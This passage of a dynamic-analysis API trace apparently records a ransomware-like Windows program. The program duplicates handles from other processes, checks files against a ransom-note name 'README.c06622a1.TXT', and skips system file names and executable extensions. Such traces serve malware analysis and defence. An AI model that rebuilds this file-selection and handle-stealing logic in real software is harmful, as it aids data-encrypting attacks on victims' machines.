lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.281] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.283] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.284] CloseHandle (hObject=0x670) returned 1 [0154.284] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0154.284] CloseHandle (hObject=0x680) returned 1 [0154.284] CloseHandle (hObject=0x62c) returned 1 [0154.284] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.284] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.284] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.285] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.285] CloseHandle (hObject=0x670) returned 1 [0154.285] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.285] CloseHandle (hObject=0x680) returned 1 [0154.285] CloseHandle (hObject=0x62c) returned 1 [0154.285] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.285] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.286] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.287] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.287] CloseHandle (hObject=0x670) returned 1 [0154.287] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0154.287] CloseHandle (hObject=0x680) returned 1 [0154.287] CloseHandle (hObject=0x62c) returned 1 [0154.287] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.287] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.287] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.288] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.288] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.288] CloseHandle (hObject=0x670) returned 1 [0154.289] _wcsicmp (_Str1="\\sqlB846.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.289] CloseHandle (hObject=0x680) returned 1 [0154.289] CloseHandle (hObject=0x62c) returned 1 [0154.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.289] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.290] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.290] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.291] CloseHandle (hObject=0x670) returned 1 [0154.291] _wcsicmp (_Str1="\\sqlB857.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.291] CloseHandle (hObject=0x680) returned 1 [0154.291] CloseHandle (hObject=0x62c) returned 1 [0154.291] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0154.291] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.292] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.292] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.292] CloseHandle (hObject=0x670) returned 1 [0154.292] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.292] CloseHandle (hObject=0x680) returned 1 [0154.292] CloseHandle (hObject=0x62c) returned 1 [0154.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0154.293] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.293] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.294] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.295] CloseHandle (hObject=0x670) returned 1 [0154.295] CloseHandle (hObject=0x680) returned 1 [0154.295] CloseHandle (hObject=0x62c) returned 1 [0154.295] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0154.295] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.295] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.296] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.296] CloseHandle (hObject=0x670) returned 1 [0154.296] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0154.296] CloseHandle (hObject=0x680) returned 1 [0154.296] CloseHandle (hObject=0x62c) returned 1 [0154.296] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0154.296] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.297] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.298] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.298] CloseHandle (hObject=0x670) returned 1 [0154.298] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0154.298] CloseHandle (hObject=0x680) returned 1 [0154.299] CloseHandle (hObject=0x62c) returned 1 [0154.299] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0154.299] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.299] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.300] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.300] CloseHandle (hObject=0x670) returned 1 [0154.300] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.300] CloseHandle (hObject=0x680) returned 1 [0154.300] CloseHandle (hObject=0x62c) returned 1 [0154.300] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0154.300] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.301] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.302] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.302] CloseHandle (hObject=0x670) returned 1 [0154.302] CloseHandle (hObject=0x680) returned 1 [0154.302] CloseHandle (hObject=0x62c) returned 1 [0154.302] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0154.302] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.303] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.305] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.305] CloseHandle (hObject=0x670) returned 1 [0154.305] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.305] CloseHandle (hObject=0x680) returned 1 [0154.305] CloseHandle (hObject=0x62c) returned 1 [0154.305] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0154.305] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.306] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.306] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.306] CloseHandle (hObject=0x670) returned 1 [0154.306] CloseHandle (hObject=0x680) returned 1 [0154.306] CloseHandle (hObject=0x62c) returned 1 [0154.306] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.307] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.307] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.308] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.308] CloseHandle (hObject=0x670) returned 1 [0154.308] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.308] CloseHandle (hObject=0x680) returned 1 [0154.308] CloseHandle (hObject=0x62c) returned 1 [0154.308] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.308] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.309] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.309] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.309] CloseHandle (hObject=0x670) returned 1 [0154.309] CloseHandle (hObject=0x680) returned 1 [0154.309] CloseHandle (hObject=0x62c) returned 1 [0154.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.310] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.310] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.311] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.311] CloseHandle (hObject=0x670) returned 1 [0154.311] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.311] CloseHandle (hObject=0x680) returned 1 [0154.311] CloseHandle (hObject=0x62c) returned 1 [0154.311] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.311] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.312] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.313] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.313] CloseHandle (hObject=0x670) returned 1 [0154.313] CloseHandle (hObject=0x680) returned 1 [0154.313] CloseHandle (hObject=0x62c) returned 1 [0154.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.313] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.314] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.314] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.314] CloseHandle (hObject=0x670) returned 1 [0154.314] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.314] CloseHandle (hObject=0x680) returned 1 [0154.314] CloseHandle (hObject=0x62c) returned 1 [0154.315] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0154.315] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.315] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.317] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.317] CloseHandle (hObject=0x670) returned 1 [0154.317] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.317] CloseHandle (hObject=0x680) returned 1 [0154.317] CloseHandle (hObject=0x62c) returned 1 [0154.318] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0154.318] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.318] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.319] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.319] CloseHandle (hObject=0x670) returned 1 [0154.319] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.319] CloseHandle (hObject=0x680) returned 1 [0154.319] CloseHandle (hObject=0x62c) returned 1 [0154.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0154.319] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.320] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.320] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.320] CloseHandle (hObject=0x670) returned 1 [0154.320] CloseHandle (hObject=0x680) returned 1 [0154.320] CloseHandle (hObject=0x62c) returned 1 [0154.321] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d8098) returned 1 [0154.321] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0154.321] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0154.321] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0154.321] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", _Str2="README.c06622a1.TXT") returned -4 [0154.321] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", _SubStr="README") returned 0x0 [0154.321] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.321] wcslen (_String="autorun.inf") returned 0xb [0154.321] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.321] wcslen (_String="boot.ini") returned 0x8 [0154.321] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.321] wcslen (_String="bootfont.bin") returned 0xc [0154.321] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.321] wcslen (_String="bootsect.bak") returned 0xc [0154.321] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.321] wcslen (_String="desktop.ini") returned 0xb [0154.321] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.321] wcslen (_String="iconcache.db") returned 0xc [0154.321] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.321] wcslen (_String="ntldr") returned 0x5 [0154.321] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -123 [0154.321] wcslen (_String="ntuser.dat") returned 0xa [0154.321] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -77 [0154.321] wcslen (_String="ntuser.dat.log") returned 0xe [0154.321] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.321] wcslen (_String="ntuser.ini") returned 0xa [0154.321] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.321] wcslen (_String="thumbs.db") returned 0x9 [0154.321] _wcsicmp (_Str1="386", _Str2="regtrans-ms") returned -63 [0154.321] wcslen (_String="386") returned 0x3 [0154.321] _wcsicmp (_Str1="adv", _Str2="regtrans-ms") returned -17 [0154.321] wcslen (_String="adv") returned 0x3 [0154.321] _wcsicmp (_Str1="ani", _Str2="regtrans-ms") returned -17 [0154.322] wcslen (_String="ani") returned 0x3 [0154.322] _wcsicmp (_Str1="bat", _Str2="regtrans-ms") returned -16 [0154.322] wcslen (_String="bat") returned 0x3 [0154.322] _wcsicmp (_Str1="bin", _Str2="regtrans-ms") returned -16 [0154.322] wcslen (_String="bin") returned 0x3 [0154.322] _wcsicmp (_Str1="cab", _Str2="regtrans-ms") returned -15 [0154.322] wcslen (_String="cab") returned 0x3 [0154.322] _wcsicmp (_Str1="cmd", _Str2="regtrans-ms") returned -15 [0154.322] wcslen (_String="cmd") returned 0x3 [0154.322] _wcsicmp (_Str1="com", _Str2="regtrans-ms") returned -15 [0154.322] wcslen (_String="com") returned 0x3 [0154.322] _wcsicmp (_Str1="cpl", _Str2="regtrans-ms") returned -15 [0154.322] wcslen (_String="cpl") returned 0x3 [0154.322] _wcsicmp (_Str1="cur", _Str2="regtrans-ms") returned -15 [0154.322] wcslen (_String="cur") returned 0x3 [0154.322] _wcsicmp (_Str1="deskthemepack", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="deskthemepack") returned 0xd [0154.322] _wcsicmp (_Str1="diagcab", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="diagcab") returned 0x7 [0154.322] _wcsicmp (_Str1="diagcfg", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="diagcfg") returned 0x7 [0154.322] _wcsicmp (_Str1="diagpkg", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="diagpkg") returned 0x7 [0154.322] _wcsicmp (_Str1="dll", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="dll") returned 0x3 [0154.322] _wcsicmp (_Str1="drv", _Str2="regtrans-ms") returned -14 [0154.322] wcslen (_String="drv") returned 0x3 [0154.322] _wcsicmp (_Str1="exe", _Str2="regtrans-ms") returned -13 [0154.322] 